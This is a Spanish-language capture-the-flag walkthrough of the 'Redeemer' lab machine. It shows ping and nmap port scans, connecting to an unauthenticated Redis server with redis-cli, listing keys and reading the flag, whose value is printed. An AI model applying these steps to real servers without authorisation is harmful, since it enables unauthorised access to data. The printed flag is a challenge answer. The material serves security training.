

Redeemer

Resolución de preguntas y la máquina

Comprobamos la conexión con el objetivo

```
ping -c 1 10.129.159.149
PING 10.129.159.149 (10.129.159.149) 56(84) bytes of data.
64 bytes from 10.129.159.149: icmp_seq=1 ttl=63 time=192 ms

--- 10.129.159.149 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 191.568/191.568/191.568/0.000 ms
```

El ttl es muy cercano a 64 por lo que nos dice que es muy probable que sea una maquina Linux

Hacemos un escaneo de puertos completo en el objetivo. Las flags -n y -Pn son para que sea más rápido el escaneo y -p- indica que revise todos los puertos

```
sudo nmap -n -Pn 10.129.159.149 -p-
Starting Nmap 7.99 ( https://nmap.org ) at 2026-07-16 20:34 -0400
Warning: 10.129.159.149 giving up on port because retransmission cap hit (2).
Stats: 0:04:32 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 46.09% done; ETC: 20:43 (0:05:18 remaining)
Nmap scan report for 10.129.159.149
Host is up (0.20s latency).
Not shown: 65534 closed tcp ports (reset)
PORT      STATE SERVICE
6379/tcp  open  redis
```

Verificamos con nmap que ese puerto sea el servicio **redis**

```
sudo nmap -sCV 10.129.159.149 -p6379
Starting Nmap 7.99 ( https://nmap.org ) at 2026-07-16 20:48 -0400
Nmap scan report for 10.129.159.149
Host is up (0.17s latency).

PORT      STATE SERVICE VERSION
6379/tcp  open  redis    Redis key-value store 5.0.7
```

Efectivamente es el servicio redis. Este servicio **almacena** datos **en memoria**. Puedes buscar más información sobre el servicio en internet

Nos conectamos al servicio usando el siguiente comando, la flag -h es para indicar el objetivo y ejecutamos el comando **info** para comprobar si necesitamos autenticación

```
redis-cli -h 10.129.159.149
10.129.159.149:6379> info
# Server
redis_version:5.0.7
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:66bd629f924ac924
redis_mode:standalone
os:Linux 5.4.0-77-generic x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
```

Esto nos confirma que la version es **5.0.7** y que no necesitamos autenticarnos

El comando `INFO keyspace` nos muestra las bases de datos disponibles

```
10.129.159.149:6379> INFO keyspace
# Keyspace
db0:keys=4,expires=0,avg_ttl=0
```

Elegimos la base de datos con **select**. En este caso hay solo una base de datos la cual es 0 y **contiene 4 keys**

```
10.129.159.149:6379> select 0
OK
```

Utilizamos `keys *` para ver las keys disponibles

```
10.129.159.149:6379> keys *
1) "flag"
2) "temp"
3) "stor"
4) "numb"
```

La key más llamativa es flag en este caso, por lo tanto veamos su contenido con **get**

```
10.129.159.149:6379> get flag
"03e1d2b376c37ab3f5319922053953eb"
```

Felicidades haz completado Redeemer